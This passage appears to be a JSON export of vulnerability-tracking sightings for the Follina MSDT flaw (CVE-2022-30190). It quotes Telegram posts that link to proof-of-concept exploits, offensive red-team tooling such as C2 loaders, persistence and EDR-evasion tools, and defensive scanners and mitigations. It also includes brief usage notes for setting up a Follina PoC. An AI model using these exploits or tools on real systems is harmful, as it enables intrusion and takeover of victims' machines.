\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b, \u0441\u043e\u0446\u0441\u0435\u0442\u0438, \u0442\u043e\u0440\u0440\u0435\u043d\u0442-\u0440\u0430\u0437\u0434\u0430\u0447\u0438. \u0425\u043e\u0442\u044f \u0441\u0430\u043c\u044b\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0432\u0441\u0451 \u0435\u0449\u0451 \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f e-mail-\u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0430 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043e\u043f\u0440\u043e\u0432\u043e\u0436\u0434\u0430\u044e\u0442\u0441\u044f \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u043e\u0434\u0432\u043e\u0434\u043a\u043e\u0439, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0438\u0432\u043b\u0435\u0447\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440: \u00ab\u0421\u0440\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0439 \u043a\u043e\u043d\u0442\u0440\u0430\u043a\u0442. \u0417\u0430\u0432\u0442\u0440\u0430 \u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u0442\u044c\u00bb.\n\n\u0417\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b, \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434. \u042d\u0442\u043e\u0442 \u043a\u043e\u0434 \u043a\u0430\u043a \u0440\u0430\u0437 \u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u2014 \u043e\u043d \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0447\u0435\u0440\u0435\u0437 MSDT \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0430 \u043f\u0440\u043e\u0448\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e, \u0445\u0430\u043a\u0435\u0440 \u0441\u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b, \u043f\u0440\u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c, \u043c\u0435\u043d\u044f\u0442\u044c \u0438\u043b\u0438 \u0443\u0434\u0430\u043b\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.", "creation_timestamp": "2025-01-14T13:04:32.000000Z"}, {"uuid": "48717c24-0d80-4f80-9ba6-5e0ec9b1679d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/65", "content": "MSDT ZERO-DAY\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190\n\n\ud83c\udfa9WARLOCK DARK ARMY OFFICIALS \ud83c\udfa9\n\n#exploit #zeroday #poc", "creation_timestamp": "2022-09-12T17:53:36.000000Z"}, {"uuid": "33958720-f6a3-4b56-b450-7b50ca966dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3028", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. \n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project written by pentesters for pentesters simplify the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-05-20T10:35:54.000000Z"}, {"uuid": "b70d1ebd-f7fb-4933-93ab-8bd938c3762f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/jjC-UMEvYm9WMdGwqx44S7y31oKWh_aFrkGisTJDTDGmWg", "content": "", "creation_timestamp": "2022-06-01T03:13:13.000000Z"}, {"uuid": "f081c6a2-9db3-45d3-a3ee-e63238145c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/BABATATASASA/5554", "content": "CVE-2022-30190 - Security Update Guide - Microsoft - Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", "creation_timestamp": "2023-10-05T19:33:27.000000Z"}, {"uuid": "067549eb-d70b-4199-80b7-0bb8e4873834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3035", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nResearch:\nhttps://fermatattack.secvuln.info\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions <= 7.13.6 LTS and <= 7.18.0 \"Latest\". This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM\n\nhttps://github.com/derco0n/mitigate-folina\n\nResearch:\nhttps://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files & directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg", "creation_timestamp": "2023-05-21T09:47:13.000000Z"}, {"uuid": "1adbcb08-ab9b-4789-baa6-c283a5db17d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3124", "content": "AnoMark\n\nThis algorithm is a Machine Learning one, using Natural Language Processing (NLP) techniques based on Markov Chains and n-grams. It offers a way to train a theoretical model on command lines  datasets considered clean. Once done it can detect malicious command lines on other datasets.\n\nhttps://github.com/ANSSI-FR/AnoMark\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-32117\n\nIntegrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints.\n\nhttps://github.com/RandomRobbieBF/CVE-2023-32117\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bGeoPincer\n\nA script that leverages OpenStreetMap's Overpass API in order to search for locations. These locations will be queried using a collection of establishments that are somewhat adjacent.\n\nhttps://github.com/tloja/GeoPincer\n\n#OSINT #cybersecurity #infosec\n\n\u200b\u200bAwesome Industrial Protocols\n\nCompilation of industrial network protocols resources focusing on offensive security.\n\n\u2022 You are currently viewing the Awesome Industrial Protocols page.\n\u2022 etailed pages for protocols are available in protocols.\n\u2022 All data is stored in MongoDB databases in db.\n\u2022 Turn/IP (in srcs) is a handy tool to manipulate this data, generate the awesome list and protocol pages, and simplify the research and test process on industrial protocols\n\nhttps://github.com/Orange-Cyberdefense/awesome-industrial-protocols\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-36884-Checker\n\nScript to check for CVE-2023-36884 hardening.\n\nhttps://github.com/tarraschk/CVE-2023-36884-Checker\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bAlcatraz\n\nA x64 binary obfuscator that is able to obfuscate various different pe files including:\n\n\u2022 .exe\n\u2022 .dll\n\u2022 .sys\n\nhttps://github.com/weak1337/Alcatraz\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCobalt Strike BOFs\n\nBeacon object files I made to use with #CobaltStrike.\n\nhttps://github.com/Und3rf10w/CobaltStrikeBOFs\n\n#infosec #pentesting #redteam\n\n\u200b\u200bWindows 11 Exploits\n\nCVE-2023-24892, CVE-2023-33131, CVE-2022-30129, CVE-2023-33137, CVE-2023-33145, CVE-2023-33148, CVE-2022-30190.\n\nhttps://github.com/nu11secur1ty/Windows11Exploits\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bADHunt v2.0\n\nA tool for enumerating Active Directory Enviroments looking for interesting AD objects, vulnerabilities, and misconfigurations. It currently uses a combination ldap queries and available tooling. It was built as a follow up to LinWinPwn.\n\nhttps://github.com/Auto19/ADHunt\n\n#infosec #pentesting #redteam\n\n\u200b\u200bIAMActionHunter\n\nIAMActionHunter is an IAM policy statement parser and query tool aims to simplify the process of collecting and understanding permission policy statements for users and roles in AWS Identity and Access Management (IAM). Although its functionality is straightforward, this tool was developed in response to the need for an efficient solution during day-to-day AWS penetration testing.\n\nhttps://github.com/RhinoSecurityLabs/IAMActionHunter\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bSysPlant\n\nA small implementation in NIM of the currently known syscall hooking methods.\n\nhttps://github.com/x42en/sysplant\n\n#infosec #pentesting #redteam\n\n\u200b\u200bUnshackle\n\nOpen-source tool to bypass windows and linux passwords from bootable usb.\n\nhttps://github.com/Fadi002/unshackle\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCASR\n\nCollect crash reports, triage, and estimate severity.\n\nhttps://github.com/ispras/casr\n\n#cybersecurity #infosec\n\n\u200b\u200bCVE-2023-27163\n\nTo assist in enumerating the webserver behind the webserver SSRF.\n\nhttps://github.com/seanrdev/cve-2023-27163\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCS2BR BOF\n\nYou would like to execute BOFs written for #CobaltStrike in #BruteRatel C4? Look no further, we got you covered! CS2BR implements a compatibility-layer that make CS BOFs use the BRC4 API. This allows you to use the vast landscape that is BOFs in BRC4.\n\nhttps://github.com/NVISOsecurity/cs2br-bof\n\nDetails:\nhttps://blog.nviso.eu/2023/07/17/introducing-cs2br-pt-ii-one-tool-to-port-them-all/\n \n#infosec #pentesting #redteam\n\n\u200b\u200bhypobrychium\n\nAV/EDR completely ignore me. Duplicate the token of a running process and run a command.\n\nhttps://github.com/foxlox/hypobrychium\n\n#cve #infosec\n\n2/3", "creation_timestamp": "2023-07-22T17:37:23.000000Z"}, {"uuid": "b287b5f2-0ebc-4832-b02b-8c07cbb67373", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2859", "content": "Tools - Hackers Factory \n\nVigil\n\nFirewall/IDS Project.\n\nFeatures:\n\u25ab\ufe0f Packet capturing using the libpcap library\n\u25ab\ufe0f Basic rules for signature based attack identification\n\u25ab\ufe0f Logging\n\u25ab\ufe0f Remote login shell\n\u25ab\ufe0f Statistics\n\nhttps://github.com/raging-loon/Vigil\n\nbadkeys\n\nTool and library to check cryptographic public keys for known vulnerabilities\n\nhttps://github.com/badkeys/badkeys\n\nPersistBOF \n\nTool To Help Automate Common Persistence Mechanisms.\n\nA tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)\n\nhttps://github.com/IcebreakerSecurity/PersistBOF\n\n\u200bIRIS\n\nWeb collaborative platform aiming to help incident responders sharing technical details during investigations.\n\nhttps://github.com/dfir-iris/iris-web\n\n\u200b\u200bThrough the Wire\n\nThrough the Wire is a proof of concept exploit for CVE-2022-26134, an OGNL injection vulnerability affecting Atlassian Confluence Server and Data Center versions <= 7.13.6 LTS and <= 7.18.0 \"Latest\". This was originally a zero-day exploited in-the-wild.\n\n\u25ab\ufe0f Vendor advisory\n\u25ab\ufe0f Volexity \"in-the-wild\" write-up\n\u25ab\ufe0f Rapid7 write-up\n\nThrough the Wire implements two different exploits. The reverse shell will shell out to bash and therefore be more likely to be detected. The file reader executes from memory and is therefore unlikely to be detected. The exploits only work on Linux installs of Confluence. They could work on Windows but I'm also lazy.\n\nhttps://github.com/jbaines-r7/through_the_wire\n\nmitigate-folina\n\nMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\n\nThis script will backup and then remove the affected registry key (as suggested by Microsoft) to mitigate CVE-2022-30190). If parameterized with \"-revert\" the script will reimport the key. This can be used when Microsoft releases a patch.\n\nScript must be run as administrator or NT-AUTHORITY\\SYSTEM (can be deployed via GPP as a startscript or scheduled task)\n\nhttps://github.com/derco0n/mitigate-folina\n\n\u200bFollinaScanner\n\nA tool written in Go that scans files & directories for the #Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u200bUnlicense\n\nA #Python 3 tool to dynamically unpack executables protected with Themida/WinLicense 2.x and 3.x.\n\nWarning: This tool will execute the target executable. Make sure to use this tool in a VM if you're unsure about what the target executable does.\n\nFeatures:\n\u25ab\ufe0f Handles Themida/Winlicense 2.x and 3.x\n\u25ab\ufe0f Handles 32-bit and 64-bit PEs (EXEs and DLLs)\n\u25ab\ufe0f Handles 32-bit and 64-bit .NET assemblies (EXEs only)\n\u25ab\ufe0f Recovers the original entry point (OEP) automatically\n\u25ab\ufe0f Recovers the (obfuscated) import table automatically\n\nhttps://github.com/ergrelet/unlicense\n\n\u200bChainsaw\n\nRapidly Search and Hunt through Windows Event Logs\n\nChainsaw provides a powerful \u2018first-response\u2019 capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.\n\nFeatures:\nSearch and extract event log records by event IDs, string matching, and regex patterns\nHunt for threats using Sigma detection rules and custom built-in detection logic\nLightning fast, written in rust, wrapping the EVTX parser library by OBenamram\nDocument tagging (detection logic matching) provided by the TAU Engine Library\nOutput in an ASCII table format, CSV format, or JSON format\n\nhttps://github.com/Countercept/chainsaw\n\n\u200bADeleg\n\nIs an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest, along with their potential issues:\n\n\u25ab\ufe0f Objects owned by users\n\u25ab\ufe0f Objects with ACEs for users\n\u25ab\ufe0f Non canonical ACL\n\u25ab\ufe0f Disabled ACL inheritance\n\u25ab\ufe0f Default ACL modified in schema\n\u25ab\ufe0f Deleted delegation trustees\n\nhttps://github.com/mtth-bfft/adeleg\n\n#cybersecurity #infosec #cybersec", "creation_timestamp": "2023-04-05T13:06:20.000000Z"}, {"uuid": "c01d4dfc-a3f9-4ed9-aea9-ae0458330604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2848", "content": "Tools - Hackers Factory \n\nAwesome Web3 hacking/security\n\nhttps://github.com/ManasHarsh/Awesome-Web3-security\n\nEducational Heap Exploitation\n\nThis repo is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases. \n\nYou can run apt source libc6 to download the source code of the Libc your are using on Debian-based operating system. You can also click \u25b6\ufe0f to debug the technique in your browser using gdb.\n\nhttps://github.com/shellphish/how2heap\n\n\u200bFastFinder\n\nIncident Response - Fast Suspicious File Finder.\n\nLightweight tool made for threat hunting, live forensics, and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria:\n\n\u25ab\ufe0f file path/name\n\u25ab\ufe0f md5 / sha1 / sha256 checksum\n\u25ab\ufe0f simple string content match\n\u25ab\ufe0f complex content condition(s) based on YARA\n\nhttps://github.com/codeyourweb/fastfinder\n\n\u200bCVE-2022-30190 Follina POC\n\nHost exploit.html on localhost, port 80. Open the docx to pop calc.\n\nTo change the remote address the doc points to, open in 7Z and edit word\\rels\\document.xml.rels to point to a new location. YOU MUST keep the exclamation mark. It will literally not run if you omit this from the end of the URL.\n\nThe exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. There is about 6000 or so included in the exploit.html\n\nhttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u200bDaily updated proxy lists\n\nFor scraping and other information gathering automations:\n\nhttps://github.com/clarketm/proxy-list\nhttps://github.com/TheSpeedX/PROXY-List\nhttps://github.com/ShiftyTR/Proxy-List\nhttps://github.com/jetkai/proxy-list\n\nSocks5 for Telegram:\nhttps://github.com/hookzof/socks5_list \n\nfire\n\nfire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. The inspiration for this work is the filter-resolved Golang code in this repository. That repo is not updated in a long time and I thought that it was time to switch to the new Golang paradigm of modules. I also added a Dockerfile.\n\nhttps://github.com/thelicato/fire\n\n\u200bWindows-exploits\n\nhttps://github.com/lyshark/Windows-exploits\n\n\u200btoolbox-pentest-web\n\nEven though this box is primarily intended for offensive operation, many tools and scripts can also be used for defensive purposes, for example, in CI/CD pipelines as security validation.\n\nhttps://github.com/righettod/toolbox-pentest-web\n\n\u200bKaynStrike\n\nA User Defined Reflective Loader for #Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.\n\nhttps://github.com/Cracked5pider/KaynStrike\n\nsabre-ng\n\nFlexible C2 framework for Nation State Simulations in #RedTeam Assessments.\n\nhttps://github.com/aidden-laoch/sabre\n\n\u200bSplunk Security Content\n\nThis project gives you access to our repository of Analytic Stories, security guides that provide background on tactics, techniques and procedures (TTPs), mapped to the MITRE ATT&CK Framework, the Lockheed Martin Cyber Kill Chain, and CIS Controls. \n\nThey include Splunk searches, machine learning algorithms and Splunk Phantom playbooks (where available)\u2014all designed to work together to detect, investigate, and respond to threats.\n\nhttps://github.com/splunk/security_content\n\n\u200bHyperDbg Debugger\n\nOpen-source, community-driven, hypervisor-assisted, user-mode and kernel-mode Windows debugger with a focus on using modern hardware technologies. It is a debugger designed for analyzing, fuzzing and reversing.\n\nhttps://github.com/HyperDbg/HyperDbg\n\nssc-reading-list\n\nA reading list for software supply-chain security.\n\nhttps://github.com/chainguard-dev/ssc-reading-list\n\n\u200bArsenal\n\nJust a quick inventory, reminder and launcher for pentest commands.\n\nThis project written by pentesters for pentesters simplify the use of all the hard-to-remember commands\n\nhttps://github.com/Orange-Cyberdefense/arsenal\n\n#pentesting #redteam", "creation_timestamp": "2023-04-04T11:31:24.000000Z"}, {"uuid": "62e403c9-8fbf-41f4-86c4-a36b4867c731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/vPwnd/19273", "content": "MSDT ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "72648e20-dba1-47ee-8390-cbb5d5eeead4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/tUEHTxaKBSTU2Y5sSCh7GbBw134FF8IyhyRditgv_Jo14H8", "content": "", "creation_timestamp": "2023-06-16T08:27:34.000000Z"}, {"uuid": "225b04ff-b0d0-4bb0-8047-319bde00b3ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/xytonicweb/124", "content": "Microsoft Office RCE - \u201cFollina\u201d MSDT Attack\n\nCVE-2022-30190\n\nhttps://github.com/JohnHammond/msdt-follina", "creation_timestamp": "2022-06-03T05:48:10.000000Z"}, {"uuid": "aef46227-8dca-4211-a659-c9d86f4948bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/breachdetector/91346", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"Telegram Channel\",\n  \"Threat Actor\": \u201cVPwnd\",\n  \"Content\": \"MSDT ZERO-DAY https://github.com/PwnC00re/PoC-CVE-2022-30190\u201d,\n  \"Detection Date\": \u201c01 Jun 2022 03:36\u201d,\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2022-06-01T03:42:55.000000Z"}, {"uuid": "62465382-7277-4c29-8d6a-39a2b4c3298a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/8yasABRsBeQ7_fA7ekcVN5-Bf6YalSSK4RwFtvSF2nNKkrM", "content": "", "creation_timestamp": "2022-12-06T17:10:12.000000Z"}, {"uuid": "04111029-4633-4839-8210-d669f44c7419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 